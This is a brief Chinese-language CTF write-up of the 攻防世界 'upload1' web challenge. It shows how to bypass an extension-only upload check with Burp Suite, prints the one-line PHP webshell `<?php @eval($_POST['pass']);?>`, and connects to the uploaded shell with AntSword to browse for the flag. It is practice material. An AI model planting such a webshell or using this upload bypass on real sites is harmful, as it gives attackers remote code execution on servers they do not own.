攻防世界 WEB 高手进阶区 upload1 Writeup
攻防世界 WEB 高手进阶区 upload1 Writeup
题目介绍
题目考点
- 文件上传漏洞
- 一句话木马
- 中国菜刀类工具的使用
Writeup
-
-
使用burpsuite抓包
-
可见只是对上传文件的后缀进行可一个简单判断
-
准备一句话木马文件, 后缀改为 jpg 格式
<?php @eval($_POST['pass']);?>
-
使用burpsuite抓包,更改文件后缀为php
-
使用蚁剑连接 http://220.249.52.134:55798/upload/1610623427.a.php 目录遍历一番,找到flag